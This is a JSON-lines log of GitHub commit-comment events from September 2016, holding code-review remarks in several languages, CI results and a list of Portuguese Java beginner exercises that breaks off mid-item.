{"id":"4615472116","type":"CommitCommentEvent","actor":{"login":"danhhuynh"},"repo":{"name":"danhhuynh/danh"},"payload":{"comment":{"id":19166836,"position":null,"line":null,"path":null,"commit_id":"f929b73193e0b5bbcba876a89c6dc1c1c81fc339","created_at":"2016-09-26T02:41:09Z","updated_at":"2016-09-26T02:41:09Z","body":"ok"}},"created_at":"2016-09-26T02:41:09Z"}
{"id":"4615475407","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"Planeshifter/isle-editor"},"payload":{"comment":{"id":19166845,"position":90,"line":90,"path":"app/components/node_modules/general/timer/index.js","commit_id":"460c0dbbce38fb66df8e84b65e800039ee4c8f44","created_at":"2016-09-26T02:42:40Z","updated_at":"2016-09-26T02:42:40Z","body":"Removed the default properties as the attributes have to be supplied by the user."}},"created_at":"2016-09-26T02:42:40Z"}
{"id":"4615476347","type":"CommitCommentEvent","actor":{"login":"joryphillips"},"repo":{"name":"samccone/moji-brush"},"payload":{"comment":{"id":19166848,"position":null,"line":null,"path":null,"commit_id":"af23513886f03cb3bdce382fb5544e33ef77ea94","created_at":"2016-09-26T02:43:07Z","updated_at":"2016-09-26T02:43:07Z","body":"Fixes #44 "}},"created_at":"2016-09-26T02:43:07Z"}
{"id":"4615476528","type":"CommitCommentEvent","actor":{"login":"bd808"},"repo":{"name":"Codeux-Software/Cocoa-Extensions"},"payload":{"comment":{"id":19166849,"position":52,"line":120,"path":"Classes/XRLogging.m","commit_id":"9a2561d10fae45f6b19740a0457e0e2b3a9b848b","created_at":"2016-09-26T02:43:13Z","updated_at":"2016-09-26T02:43:13Z","body":"`_LogToConsoleIsUsingUnifiedLogging` is undefined unless `#if _LogToConsoleSupportsUnifiedLogging == 1` is true above."}},"created_at":"2016-09-26T02:43:13Z"}
{"id":"4615477614","type":"CommitCommentEvent","actor":{"login":"ryuhhnn"},"repo":{"name":"ryuhhnn/plan"},"payload":{"comment":{"id":19166853,"position":null,"line":null,"path":null,"commit_id":"3940a23d83d05b12c582d01b2234247cf983cb17","created_at":"2016-09-26T02:43:45Z","updated_at":"2016-09-26T02:43:45Z","body":"#9 "}},"created_at":"2016-09-26T02:43:45Z"}
{"id":"4615477816","type":"CommitCommentEvent","actor":{"login":"AkiraXue"},"repo":{"name":"AkiraXue/react-native-router-flux"},"payload":{"comment":{"id":19166854,"position":null,"line":null,"path":null,"commit_id":"ecf934e0c2a4832b2f56a727f3c00185a90f471b","created_at":"2016-09-26T02:43:51Z","updated_at":"2016-09-26T02:43:51Z","body":"add new change"}},"created_at":"2016-09-26T02:43:51Z"}
{"id":"4615478093","type":"CommitCommentEvent","actor":{"login":"shibata0430"},"repo":{"name":"shibata0430/test2"},"payload":{"comment":{"id":19166855,"position":5,"line":24,"path":"Project1/Project1/Source.cpp","commit_id":"ccd804efb0349018b69a171419c209008d44e1db","created_at":"2016-09-26T02:43:59Z","updated_at":"2016-09-26T02:43:59Z","body":"あ"}},"created_at":"2016-09-26T02:43:59Z"}
{"id":"4615478609","type":"CommitCommentEvent","actor":{"login":"Carolina14"},"repo":{"name":"Carolina14/carolina"},"payload":{"comment":{"id":19166857,"position":null,"line":null,"path":null,"commit_id":"5cea00812eb551a303127c0bdc690909cace32a7","created_at":"2016-09-26T02:44:13Z","updated_at":"2016-09-26T02:44:13Z","body":"哈囉"}},"created_at":"2016-09-26T02:44:13Z"}
{"id":"4615479133","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jltanner/relaxr-landing-page"},"payload":{"comment":{"id":19166858,"position":35,"line":35,"path":"index.html","commit_id":"0933cba86641d1dc20534dadc4a4a87c4fcd4fe5","created_at":"2016-09-26T02:44:27Z","updated_at":"2016-09-26T02:44:27Z","body":"Just in case you didn't discover it, this would've been the perfect opportunity to use the `blockquote` tag."}},"created_at":"2016-09-26T02:44:27Z"}
{"id":"4615479684","type":"CommitCommentEvent","actor":{"login":"TColorCat"},"repo":{"name":"TColorCat/Hello-world"},"payload":{"comment":{"id":19166859,"position":3,"line":3,"path":"README.md","commit_id":"e37fc98dcb9650ddb1c82cc6a4e4505638a12d88","created_at":"2016-09-26T02:44:42Z","updated_at":"2016-09-26T02:44:42Z","body":"a little try"}},"created_at":"2016-09-26T02:44:42Z"}
{"id":"4615479983","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jltanner/relaxr-landing-page"},"payload":{"comment":{"id":19166861,"position":36,"line":36,"path":"index.html","commit_id":"0933cba86641d1dc20534dadc4a4a87c4fcd4fe5","created_at":"2016-09-26T02:44:50Z","updated_at":"2016-09-26T02:44:50Z","body":"I would've made this a `span` or `p`. Not really a heading."}},"created_at":"2016-09-26T02:44:50Z"}
{"id":"4615480716","type":"CommitCommentEvent","actor":{"login":"masato-haruta"},"repo":{"name":"opdsk/my-1st-errand"},"payload":{"comment":{"id":19166865,"position":null,"line":null,"path":null,"commit_id":"9a0e2f34d85c31e7c363733ff942de7f669d872d","created_at":"2016-09-26T02:45:12Z","updated_at":"2016-09-26T02:45:12Z","body":"おぉログイン機能"}},"created_at":"2016-09-26T02:45:12Z"}
{"id":"4615483731","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"jltanner/relaxr-landing-page"},"payload":{"comment":{"id":19166871,"position":44,"line":44,"path":"index.html","commit_id":"0933cba86641d1dc20534dadc4a4a87c4fcd4fe5","created_at":"2016-09-26T02:46:33Z","updated_at":"2016-09-26T02:46:33Z","body":"Loving the use of classes for the logo. I would've use \"logo\" instead of \"nav\" so it's more generic for the different places it could appear."}},"created_at":"2016-09-26T02:46:33Z"}
{"id":"4615485877","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19166879,"position":null,"line":null,"path":null,"commit_id":"f0de2301920f928cc1e89fbae2c7c541ca04a914","created_at":"2016-09-26T02:47:32Z","updated_at":"2016-09-26T02:47:32Z","body":"#3159"}},"created_at":"2016-09-26T02:47:32Z"}
{"id":"4615489536","type":"CommitCommentEvent","actor":{"login":"daniel037"},"repo":{"name":"daniel037/BooksStore"},"payload":{"comment":{"id":19166886,"position":null,"line":null,"path":null,"commit_id":"4a2e0b8dfa635fc47d782a3c6e01e677b77be4d1","created_at":"2016-09-26T02:49:11Z","updated_at":"2016-09-26T02:49:11Z","body":"no \r\n"}},"created_at":"2016-09-26T02:49:11Z"}
{"id":"4615490107","type":"CommitCommentEvent","actor":{"login":"afc163"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19166889,"position":null,"line":null,"path":null,"commit_id":"4663995f69eea14ea001c3c4161da059a0abec78","created_at":"2016-09-26T02:49:29Z","updated_at":"2016-09-26T02:49:29Z","body":"`targetKeys.filter(({ key }) => dataSource.indexOf(key) >= 0)`\r\n\r\n交换一下是不是就行了？"}},"created_at":"2016-09-26T02:49:29Z"}
{"id":"4615490687","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"Planeshifter/isle-editor"},"payload":{"comment":{"id":19166891,"position":null,"line":null,"path":null,"commit_id":"460c0dbbce38fb66df8e84b65e800039ee4c8f44","created_at":"2016-09-26T02:49:46Z","updated_at":"2016-09-26T02:49:46Z","body":"The Timer worked great!\r\nI have one request:\r\nCould we add a flag, which controls whether localStorage is used to make the timer persistent? \r\nIt makes using the component easier while developing a module, and there are also legitimate use cases where it's okay if the timer restarts when you refresh the page. "}},"created_at":"2016-09-26T02:49:46Z"}
{"id":"4615491162","type":"CommitCommentEvent","actor":{"login":"hhkbp2"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19166894,"position":9,"line":353,"path":"src/raftstore/store/peer.rs","commit_id":"9a608b309b6c7099da42e8d8af02a58d04dfb80b","created_at":"2016-09-26T02:50:01Z","updated_at":"2016-09-26T02:50:01Z","body":"A map would do it's job if numbers of message type needs to be checked. As the below:\r\n\r\n```\r\nlet m = HashMap::new();\r\nfor t in typesToBeChecked {\r\n   m[t] = 0;\r\n}\r\nlet countMap = ready.messages.iter().fold(m, |acc, msg| {\r\n    if m.contains(msg.get_msg_type()) {\r\n       m[msg.get_msg_type()] += 1;\r\n   }\r\n});\r\n// add metrics in m\r\n```"}},"created_at":"2016-09-26T02:50:01Z"}
{"id":"4615495021","type":"CommitCommentEvent","actor":{"login":"shepmaster"},"repo":{"name":"avr-rust/rust"},"payload":{"comment":{"id":19166904,"position":18,"line":180,"path":"src/rustllvm/ArchiveWrapper.cpp","commit_id":"2b8a912580c54e3c6d3922c861e51e79b0089a8c","created_at":"2016-09-26T02:51:44Z","updated_at":"2016-09-26T02:51:44Z","body":"Careful here:\r\n\r\n>   /// Bool conversion. **Returns true if this Error is in a failure state**,\r\n>  /// and false if it is in an accept state. If the error is in a Success state\r\n>  /// it will be considered checked.\r\n\r\nEither I'm reading it completely backwards, or it seems completely braindead."}},"created_at":"2016-09-26T02:51:44Z"}
{"id":"4615497539","type":"CommitCommentEvent","actor":{"login":"hhkbp2"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19166913,"position":9,"line":353,"path":"src/raftstore/store/peer.rs","commit_id":"9a608b309b6c7099da42e8d8af02a58d04dfb80b","created_at":"2016-09-26T02:52:51Z","updated_at":"2016-09-26T02:52:51Z","body":"The implementation of this PR is revised to avoid calling `metric.inc()` in a loop, which may affect the performance."}},"created_at":"2016-09-26T02:52:51Z"}
{"id":"4615498133","type":"CommitCommentEvent","actor":{"login":"bshishov"},"repo":{"name":"bshishov/Memorandum"},"payload":{"comment":{"id":19166915,"position":41,"line":33,"path":"main/factories.py","commit_id":"26777b7eb4f77156ea921c7f0e72c18b620dc5b8","created_at":"2016-09-26T02:53:07Z","updated_at":"2016-09-26T02:53:07Z","body":"Это не фабрика, т.к. редакторы она не создает. Это скорее такой менеджер, или реестр. т.е. гораздо логичнее было бы назвать есть EditorsManager или EditorsRegistry"}},"created_at":"2016-09-26T02:53:07Z"}
{"id":"4615499373","type":"CommitCommentEvent","actor":{"login":"asakahara"},"repo":{"name":"kunitoku/RssReader"},"payload":{"comment":{"id":19166917,"position":5,"line":11,"path":"RssReader/ListViewController.swift","commit_id":"16a8d3902aaad0ff81749fa5b8287329204ad984","created_at":"2016-09-26T02:53:40Z","updated_at":"2016-09-26T02:53:40Z","body":"【MUST】非同期でclosureからselfにアクセスする際はweak参照にした方がいいです\r\n```\r\nxml?.parse(url: Setting.RssUrl) { [weak self] in\r\n    self?.tableView.reloadData()\r\n}\r\n```"}},"created_at":"2016-09-26T02:53:40Z"}
{"id":"4615499922","type":"CommitCommentEvent","actor":{"login":"dylanmckay"},"repo":{"name":"avr-rust/rust"},"payload":{"comment":{"id":19166918,"position":18,"line":180,"path":"src/rustllvm/ArchiveWrapper.cpp","commit_id":"2b8a912580c54e3c6d3922c861e51e79b0089a8c","created_at":"2016-09-26T02:53:55Z","updated_at":"2016-09-26T02:53:55Z","body":"Yeah, that's really counterintuitive. Will fix."}},"created_at":"2016-09-26T02:53:55Z"}
{"id":"4615501192","type":"CommitCommentEvent","actor":{"login":"aloavi"},"repo":{"name":"aloavi/Homepage"},"payload":{"comment":{"id":19166921,"position":null,"line":null,"path":null,"commit_id":"b0fe3d49aba8b7b314d34e7f7d431cf92a9d590b","created_at":"2016-09-26T02:54:30Z","updated_at":"2016-09-26T02:54:30Z","body":"Made a mistake configuring User Name"}},"created_at":"2016-09-26T02:54:30Z"}
{"id":"4615501469","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19166922,"position":4,"line":28,"path":"issue11-2/update-edit.php","commit_id":"78ac38f03f7e092a9b4064e8e870f7a4cdb91e70","created_at":"2016-09-26T02:54:36Z","updated_at":"2016-09-26T02:54:36Z","body":"おお、いいですね！\r\n細かいですが、`id`はINT型なので、`PDO::PARAM_STR` で合っているのか確認してみましょう。"}},"created_at":"2016-09-26T02:54:36Z"}
{"id":"4615501595","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tikv"},"payload":{"comment":{"id":19166923,"position":9,"line":353,"path":"src/raftstore/store/peer.rs","commit_id":"9a608b309b6c7099da42e8d8af02a58d04dfb80b","created_at":"2016-09-26T02:54:40Z","updated_at":"2016-09-26T02:54:40Z","body":"so why not use a counter directly? why use iter + fold? "}},"created_at":"2016-09-26T02:54:40Z"}
{"id":"4615503029","type":"CommitCommentEvent","actor":{"login":"amites"},"repo":{"name":"amites/davinci_class_2016"},"payload":{"comment":{"id":19166927,"position":5,"line":60,"path":"davinci/settings.py","commit_id":"6e71edc0eab26bdba3a14987490a5ff3442cb18a","created_at":"2016-09-26T02:55:20Z","updated_at":"2016-09-26T02:55:20Z","body":"Add reference for where to look for templates"}},"created_at":"2016-09-26T02:55:20Z"}
{"id":"4615503626","type":"CommitCommentEvent","actor":{"login":"amites"},"repo":{"name":"amites/davinci_class_2016"},"payload":{"comment":{"id":19166930,"position":1,"line":1,"path":"file_structure.txt","commit_id":"6e71edc0eab26bdba3a14987490a5ff3442cb18a","created_at":"2016-09-26T02:55:36Z","updated_at":"2016-09-26T02:55:36Z","body":"Extra reference for how the project files are laid out"}},"created_at":"2016-09-26T02:55:36Z"}
{"id":"4615504810","type":"CommitCommentEvent","actor":{"login":"amites"},"repo":{"name":"amites/davinci_class_2016"},"payload":{"comment":{"id":19166933,"position":1,"line":1,"path":"hello_world/templates/base.html","commit_id":"6e71edc0eab26bdba3a14987490a5ff3442cb18a","created_at":"2016-09-26T02:56:06Z","updated_at":"2016-09-26T02:56:06Z","body":"whole new template\r\n\r\n - create `base.html` in PyCharm"}},"created_at":"2016-09-26T02:56:06Z"}
{"id":"4615504968","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"gsofia/relaxr-landing-page"},"payload":{"comment":{"id":19166935,"position":31,"line":31,"path":"css/style.css","commit_id":"0980fd18136a2740530677b4008e34e55cf53469","created_at":"2016-09-26T02:56:09Z","updated_at":"2016-09-26T02:56:09Z","body":"Let's use all lowercase for classes and id names."}},"created_at":"2016-09-26T02:56:09Z"}
{"id":"4615505471","type":"CommitCommentEvent","actor":{"login":"amites"},"repo":{"name":"amites/davinci_class_2016"},"payload":{"comment":{"id":19166938,"position":5,"line":5,"path":"hello_world/templates/base.html","commit_id":"6e71edc0eab26bdba3a14987490a5ff3442cb18a","created_at":"2016-09-26T02:56:22Z","updated_at":"2016-09-26T02:56:22Z","body":"Title is the whole page title that displays in the browser tab / window."}},"created_at":"2016-09-26T02:56:22Z"}
{"id":"4615506965","type":"CommitCommentEvent","actor":{"login":"kunitoku"},"repo":{"name":"kunitoku/RssReader"},"payload":{"comment":{"id":19166941,"position":5,"line":11,"path":"RssReader/ListViewController.swift","commit_id":"16a8d3902aaad0ff81749fa5b8287329204ad984","created_at":"2016-09-26T02:57:01Z","updated_at":"2016-09-26T02:57:01Z","body":"なるほど！ありがとうございます！"}},"created_at":"2016-09-26T02:57:01Z"}
{"id":"4615507408","type":"CommitCommentEvent","actor":{"login":"amites"},"repo":{"name":"amites/davinci_class_2016"},"payload":{"comment":{"id":19166942,"position":7,"line":7,"path":"hello_world/templates/base.html","commit_id":"6e71edc0eab26bdba3a14987490a5ff3442cb18a","created_at":"2016-09-26T02:57:11Z","updated_at":"2016-09-26T02:57:11Z","body":"Copied directly from http://getbootstrap.com/getting-started/#download-cdn"}},"created_at":"2016-09-26T02:57:11Z"}
{"id":"4615509868","type":"CommitCommentEvent","actor":{"login":"amites"},"repo":{"name":"amites/davinci_class_2016"},"payload":{"comment":{"id":19166946,"position":16,"line":16,"path":"hello_world/templates/base.html","commit_id":"6e71edc0eab26bdba3a14987490a5ff3442cb18a","created_at":"2016-09-26T02:58:14Z","updated_at":"2016-09-26T02:58:14Z","body":"Copied from tinkering with css through chrome developer tools, through inspect."}},"created_at":"2016-09-26T02:58:14Z"}
{"id":"4615512275","type":"CommitCommentEvent","actor":{"login":"shepmaster"},"repo":{"name":"avr-rust/rust"},"payload":{"comment":{"id":19166954,"position":5,"line":305,"path":"mk/main.mk","commit_id":"9ee76e7b66f3bd2a5952052fdea670bdc58c71b5","created_at":"2016-09-26T02:59:22Z","updated_at":"2016-09-26T02:59:22Z","body":"Any idea what this is actually used for? I wouldn't think Objective-C would have anything to do with Rust's use of LLVM."}},"created_at":"2016-09-26T02:59:22Z"}
{"id":"4615512531","type":"CommitCommentEvent","actor":{"login":"amites"},"repo":{"name":"amites/davinci_class_2016"},"payload":{"comment":{"id":19166955,"position":24,"line":24,"path":"hello_world/templates/base.html","commit_id":"6e71edc0eab26bdba3a14987490a5ff3442cb18a","created_at":"2016-09-26T02:59:30Z","updated_at":"2016-09-26T02:59:30Z","body":"Copied from The \"View Source\" of http://getbootstrap.com/examples/starter-template/"}},"created_at":"2016-09-26T02:59:30Z"}
{"id":"4615513407","type":"CommitCommentEvent","actor":{"login":"amites"},"repo":{"name":"amites/davinci_class_2016"},"payload":{"comment":{"id":19166957,"position":31,"line":31,"path":"hello_world/templates/base.html","commit_id":"6e71edc0eab26bdba3a14987490a5ff3442cb18a","created_at":"2016-09-26T02:59:55Z","updated_at":"2016-09-26T02:59:55Z","body":"Where the magic happens, displaying the `StuffToRate` model instances."}},"created_at":"2016-09-26T02:59:55Z"}
{"id":"4615513440","type":"CommitCommentEvent","actor":{"login":"TongTungGiang"},"repo":{"name":"TongTungGiang/BlindBattle"},"payload":{"comment":{"id":19166958,"position":65,"line":262,"path":"Assets/Scripts/Tank/BaseTankController.cs","commit_id":"0da02c9ac8efe8a00c6c046e244d90183b3f6376","created_at":"2016-09-26T02:59:55Z","updated_at":"2016-09-26T02:59:55Z","body":"Chỗ này phải để là TakeDam(int dam) chứ, code convention nói rõ rồi mà."}},"created_at":"2016-09-26T02:59:55Z"}
{"id":"4620080183","type":"CommitCommentEvent","actor":{"login":"hleb-albau"},"repo":{"name":"marina-gergalova/lab1"},"payload":{"comment":{"id":19178838,"position":8,"line":24,"path":"src/lab1/MainApplication.java","commit_id":"9f0b5dec40d8cab0397f2382050bbc5f95ae368c","created_at":"2016-09-26T20:00:36Z","updated_at":"2016-09-26T20:00:36Z","body":"parts2 not apple size, but calories"}},"created_at":"2016-09-26T20:00:36Z"}
{"id":"4620080353","type":"CommitCommentEvent","actor":{"login":"samclaridge"},"repo":{"name":"NewSpring/Holtzmann"},"payload":{"comment":{"id":19178839,"position":84,"line":57,"path":"imports/pages/devotionals/devotions.Single.js","commit_id":"7beffe3cfc5ced30debd525ecfd7123efa876c42","created_at":"2016-09-26T20:00:38Z","updated_at":"2016-09-26T20:00:38Z","body":"DEVOTION_QUERY"}},"created_at":"2016-09-26T20:00:38Z"}
{"id":"4620080827","type":"CommitCommentEvent","actor":{"login":"HenryLoenwind"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":19178842,"position":37,"line":83,"path":"src/main/java/net/minecraftforge/fml/common/registry/PersistentRegistryManager.java","commit_id":"7a843760444f99743dc07cdc99cf364f23398e74","created_at":"2016-09-26T20:00:43Z","updated_at":"2016-09-26T20:00:43Z","body":"So we should put all our blocks into a temporary list and then register them in the sound registry event? That sounds a bit convoluted, tbh..."}},"created_at":"2016-09-26T20:00:43Z"}
{"id":"4620081814","type":"CommitCommentEvent","actor":{"login":"hleb-albau"},"repo":{"name":"marina-gergalova/lab1"},"payload":{"comment":{"id":19178843,"position":10,"line":11,"path":"src/lab1/Food.java","commit_id":"9f0b5dec40d8cab0397f2382050bbc5f95ae368c","created_at":"2016-09-26T20:00:54Z","updated_at":"2016-09-26T20:00:54Z","body":"wtf"}},"created_at":"2016-09-26T20:00:54Z"}
{"id":"4620084661","type":"CommitCommentEvent","actor":{"login":"samclaridge"},"repo":{"name":"NewSpring/Holtzmann"},"payload":{"comment":{"id":19178848,"position":88,"line":61,"path":"imports/pages/devotionals/devotions.Single.js","commit_id":"7beffe3cfc5ced30debd525ecfd7123efa876c42","created_at":"2016-09-26T20:01:24Z","updated_at":"2016-09-26T20:01:24Z","body":"```\r\nname: \"devotion\"\r\n```"}},"created_at":"2016-09-26T20:01:24Z"}
{"id":"4620085673","type":"CommitCommentEvent","actor":{"login":"hleb-albau"},"repo":{"name":"marina-gergalova/lab1"},"payload":{"comment":{"id":19178850,"position":7,"line":7,"path":"src/lab1/Nutritious.java","commit_id":"9f0b5dec40d8cab0397f2382050bbc5f95ae368c","created_at":"2016-09-26T20:01:35Z","updated_at":"2016-09-26T20:01:35Z","body":"add method that returns int"}},"created_at":"2016-09-26T20:01:35Z"}
{"id":"4620086700","type":"CommitCommentEvent","actor":{"login":"hsutter"},"repo":{"name":"hsutter/gcpp"},"payload":{"comment":{"id":19178851,"position":50,"line":98,"path":"bitflags.h","commit_id":"a1902796acb51adf3ef7f91e9d7873c3562cbd65","created_at":"2016-09-26T20:01:46Z","updated_at":"2016-09-26T20:01:46Z","body":"Good point. But: `&& !test` right?"}},"created_at":"2016-09-26T20:01:46Z"}
{"id":"4620089836","type":"CommitCommentEvent","actor":{"login":"hleb-albau"},"repo":{"name":"marina-gergalova/lab1"},"payload":{"comment":{"id":19178867,"position":7,"line":18,"path":"src/lab1/Cheese.java","commit_id":"9f0b5dec40d8cab0397f2382050bbc5f95ae368c","created_at":"2016-09-26T20:02:19Z","updated_at":"2016-09-26T20:02:19Z","body":"wtf"}},"created_at":"2016-09-26T20:02:19Z"}
{"id":"4620090125","type":"CommitCommentEvent","actor":{"login":"hleb-albau"},"repo":{"name":"marina-gergalova/lab1"},"payload":{"comment":{"id":19178868,"position":8,"line":53,"path":"src/lab1/Apple.java","commit_id":"9f0b5dec40d8cab0397f2382050bbc5f95ae368c","created_at":"2016-09-26T20:02:23Z","updated_at":"2016-09-26T20:02:23Z","body":"wtf"}},"created_at":"2016-09-26T20:02:23Z"}
{"id":"4620094124","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19178878,"position":null,"line":null,"path":null,"commit_id":"81eea873e524c835ca2533dbb13f4b950d9f5ea4","created_at":"2016-09-26T20:03:09Z","updated_at":"2016-09-26T20:03:09Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.265.81eea873e524c835ca2533dbb13f4b950d9f5ea4](http://build.palaso.org/viewLog.html?buildId=77128&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1498, ignored: 17 Build time: 00:07:13"}},"created_at":"2016-09-26T20:03:09Z"}
{"id":"4620101533","type":"CommitCommentEvent","actor":{"login":"suhassrivats"},"repo":{"name":"Adventure-Inc/chachas-adventures"},"payload":{"comment":{"id":19178904,"position":null,"line":null,"path":null,"commit_id":"042e76ce8ca5501b76c2325221a0acef70d57db6","created_at":"2016-09-26T20:04:28Z","updated_at":"2016-09-26T20:04:28Z","body":"Changed an image in the carousel/slider."}},"created_at":"2016-09-26T20:04:28Z"}
{"id":"4620102862","type":"CommitCommentEvent","actor":{"login":"CaseyCarter"},"repo":{"name":"hsutter/gcpp"},"payload":{"comment":{"id":19178913,"position":50,"line":98,"path":"bitflags.h","commit_id":"a1902796acb51adf3ef7f91e9d7873c3562cbd65","created_at":"2016-09-26T20:04:43Z","updated_at":"2016-09-26T20:04:43Z","body":"Yes. I was, uh, testing you. Congratulations."}},"created_at":"2016-09-26T20:04:43Z"}
{"id":"4620106040","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19178920,"position":null,"line":null,"path":null,"commit_id":"635b218854c572678cf7f8b938d115fb7940dd94","created_at":"2016-09-26T20:05:17Z","updated_at":"2016-09-26T20:05:17Z","body":"The following doc(s) have been deployed to the [terminusma](https://terminusma-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/terminus/commands](https://terminusma-static-docs.pantheonsite.io/docs/terminus/commands)\n- [docs/terminus/examples](https://terminusma-static-docs.pantheonsite.io/docs/terminus/examples)\n- [source/docs/assets/js/main.js](https://github.com/pantheon-systems/documentation/commit/138d94262acf87c47e222e4d1efac1876fa067e8/source/docs/assets/js/main.js)\n- [docs/guides/terminus](https://terminusma-static-docs.pantheonsite.io/docs/guides/terminus)\n"}},"created_at":"2016-09-26T20:05:17Z"}
{"id":"4620107908","type":"CommitCommentEvent","actor":{"login":"luandacostasilva"},"repo":{"name":"luandacostasilva/aprendendo-git"},"payload":{"comment":{"id":19178923,"position":null,"line":null,"path":null,"commit_id":"d84d1641303d108793eff03d19b302122f825862","created_at":"2016-09-26T20:05:38Z","updated_at":"2016-09-26T20:05:38Z","body":"**Sequestraram o toim, sequestraram o toim,\r\nO toim e meu amigo, eu vou pagar o resgate, eu vou pagar o resgate do seu toim querido\r\nEu nao quero policia pelo meio que os home e perigoso\r\nE se matarem o toim, e se matarem o toim nao vou comer gostoso\r\nEu nao quero policia pelo meioque os home e perigoso\r\nE se matarem o toim, e se matarem o toim nao vou comer gostoso\r\nLibera o toim que eu te dou 10 conto, libera o toim que eu te dou 10 conto\r\nLibera o toim que eu te dou 10 conto, libera o toim que eu te dou 10 conto**"}},"created_at":"2016-09-26T20:05:38Z"}
{"id":"4620111350","type":"CommitCommentEvent","actor":{"login":"FranciniSilva"},"repo":{"name":"FranciniSilva/Java"},"payload":{"comment":{"id":19178938,"position":null,"line":null,"path":null,"commit_id":"2fbbe3bc615987529ab37d0976df9a0e55ff3fe1","created_at":"2016-09-26T20:06:15Z","updated_at":"2016-09-26T20:06:15Z","body":"Exercícios\tde\tJava\t– Aula\t15\r\n\r\n**1.** Faça um Programa que peça dois números e imprima o maior deles.\r\n**2.** Faça um Programa que peça um valor e mostre na tela se o valor é positivo ou negativo.\r\n**3**. Faça um Programa que verifique se uma letra digitada é \"F\" ou \"M\". Conforme a letra escrever: F - Feminino, M - Masculino, Sexo Inválido.\r\n**4**. Faça um Programa que verifique se uma letra digitada é vogal ou consoante.\r\n**5**. Faça um programa para a leitura de duas notas parciais de um aluno. O programa deve calcular a média alcançada por aluno e apresentar:\r\n- A mensagem \"Aprovado\", se a média alcançada for maior ou igual a sete;\r\n- A mensagem \"Reprovado\", se a média for menor do que sete;\r\n- A mensagem \"Aprovado com Distinção\", se a média for igual a dez.\r\n**6.** Faça um Programa que leia três números e mostre o maior deles.\r\n**7.** Faça um Programa que leia três números e mostre o maior e o menor deles.\r\n**8.** Faça um programa que pergunte o preço de três produtos e informe qual produto você deve comprar, sabendo que a decisão é sempre pelo mais barato.\r\n**9.** Faça um Programa que leia três números e mostre-os em ordem decrescente.\r\n**10**.Faça um Programa que pergunte em que turno você estuda. Peça para digitar M-matutino ou V-Vespertino ou N- Noturno. Imprima a mensagem \"Bom Dia!\", \"Boa Tarde!\" ou \"Boa Noite!\" ou \"Valor Inválido!\", conforme o caso.\r\n**11.**As Organizações Tabajara resolveram dar um aumento de salário aos seus colaboradores e lhe contraram para desenvolver o programa que calculará os reajustes.\r\n- Faça um programa que recebe o salário de um colaborador e o reajuste segundo o seguinte critério, baseado no salário atual:\r\n- salários até R$ 280,00 (incluindo) : aumento de 20%\r\n- salários entre R$ 280,00 e R$ 700,00 : aumento de 15%\r\n- salários entre R$ 700,00 e R$ 1500,00 : aumento de 10%\r\n- salários de R$ 1500,00 em diante : aumento de 5% Após o aumento ser realizado, informe na tela:\r\n- o salário antes do reajuste;\r\n- o percentual de aumento aplicado;\r\n- o valor do aumento;\r\n- o novo salário, após o aumento.\r\n**12**.Faça um programa para o cálculo de uma folha de pagamento, sabendo que os descontos são do Imposto de Renda, que depende do salário bruto (conforme tabela abaixo) e 3% para o Sindicato e que o\r\nFGTS corresponde a 11% do Salário Bruto, mas não é descontado (é a empresa que deposita). O Salário Líquido corresponde ao Salário Bruto menos os descontos. O programa deverá pedir ao usuário o\r\nvalor da sua hora e a quantidade de horas trabalhadas no mês.\r\n- Desconto do IR:\r\n- Salário Bruto até 900 (inclusive) - isento\r\n- Salário Bruto até 1500 (inclusive) - desconto de 5%\r\n- Salário Bruto até 2500 (inclusive) - desconto de 10%\r\n- Salário Bruto acima de 2500 - desconto de 20% Imprima na tela as informações, dispostas conforme o exemplo abaixo. No exemplo o valor da hora é 5 e a quantidade de hora é 220.\r\nSalário Bruto: (5 * 220) : R$ 1100,00\r\n(-) IR (5%) : R$ 55,00\r\n(-) INSS ( 10%) : R$ 110,00\r\nFGTS (11%) : R$ 121,00\r\nTotal de descontos : R$ 165,00\r\nSalário Liquido : R$ 935,00\r\n**13**.Faça um Programa que leia um número e exiba o dia correspondente da semana. (1-Domingo, 2- Segunda, etc.), se digitar outro valor deve aparecer valor inválido.\r\n**14**.Faça um programa que lê as duas notas parciais obtidas por um aluno numa disciplina ao longo de um semestre, e calcule a sua média. A atribuição de conceitos obedece à tabela abaixo:\r\n- Média de Aproveitamento Conceito\r\n- Entre 9.0 e 10.0 A\r\n- Entre 7.5 e 9.0 B\r\n- Entre 6.0 e 7.5 C\r\n- Entre 4.0 e 6.0 D\r\n- Entre 4.0 e zero E\r\nO algoritmo deve mostrar na tela as notas, a média, o conceito correspondente e a mensagem “APROVADO” se o conceito for A, B ou C ou “REPROVADO” se o conceito for D ou E.\r\n**15**.Faça um Programa que peça os 3 lados de um triângulo. O programa deverá informar se os valores podem ser um triângulo. Indique, caso os lados formem um triângulo, se o mesmo é: equilátero, isósceles ou escaleno.\r\n- Dicas:\r\n- Três lados formam um triângulo quando a soma de quaisquer dois lados for maior que o terceiro;\r\n- Triângulo Equilátero: três lados iguais;\r\n- Triângulo Isósceles: quaisquer dois lados iguais;\r\n- Triângulo Escaleno: três lados diferentes;\r\n**16**.Faça um programa que calcule as raízes de uma equação do segundo grau, na forma ax2 + bx + c. 